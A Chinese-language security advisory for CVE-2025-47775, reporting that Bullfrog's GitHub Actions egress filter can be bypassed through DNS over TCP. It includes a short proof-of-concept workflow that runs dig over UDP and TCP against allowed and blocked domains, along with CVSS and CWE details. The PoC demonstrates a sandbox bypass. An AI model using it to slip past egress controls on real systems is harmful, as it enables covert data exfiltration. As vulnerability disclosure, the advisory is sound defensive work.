本文详细分析了CVE-2025-47775安全漏洞,该漏洞存在于Bullfrog的DNS over TCP实现中,攻击者可通过TCP协议绕过域名过滤机制进行DNS数据外泄。文章包含漏洞原理、PoC验证代码和修复方案。
CVE-2025-47775:Bullfrog的DNS over TCP绕过域名过滤漏洞
漏洞详情
包信息
- 包名称: actions
- 受影响版本: < 0.8.4
- 已修复版本: 0.8.4
漏洞描述
摘要
使用TCP协议会破坏域名阻断机制,允许DNS数据外泄。
概念验证(PoC)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
|
name: test
on:
push:
branches:
- "*"
jobs:
testBullFrog:
runs-on: ubuntu-22.04
steps:
- name: Use google dns
run: |
sudo resolvectl dns eth0 1.1.1.1
resolvectl status
- name: Set up bullfrog to block everything
uses: bullfrogsec/bullfrog@1472c28724ef13ea0adc54d0a42c2853d42786b1 # v0.8.2
with:
egress-policy: block
allowed-domains: |
*.github.com
- name: Test connectivity
run: |
echo testing udp allowed ..
dig api.github.com @1.1.1.1 || :
echo testing tcp allowed ..
dig api.github.com @1.1.1.1 +tcp || :
echo testing udp not allowed
dig api.google.com @1.1.1.1 || :
echo testing tcp not allowed
dig api.google.com @1.1.1.1 +tcp || :
|
影响
沙箱绕过
参考链接
安全评分
严重程度
中等
CVSS总体评分
6.2/10
CVSS v3基础指标
- 攻击向量: 本地(L)
- 攻击复杂度: 低(L)
- 所需权限: 无(N)
- 用户交互: 无(N)
- 范围: 未改变(U)
- 机密性: 高(H)
- 完整性: 无(N)
- 可用性: 无(N)
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS评分
0.051%(第16百分位)
弱点分类
CWE-201: 在发送的数据中插入敏感信息
代码将数据传输给另一个参与者,但部分数据包含不应被该参与者访问的敏感信息。
标识符
- CVE ID: CVE-2025-47775
- GHSA ID: GHSA-m32f-fjw2-37v3
源代码
bullfrogsec/bullfrog
致谢
报告者: vin01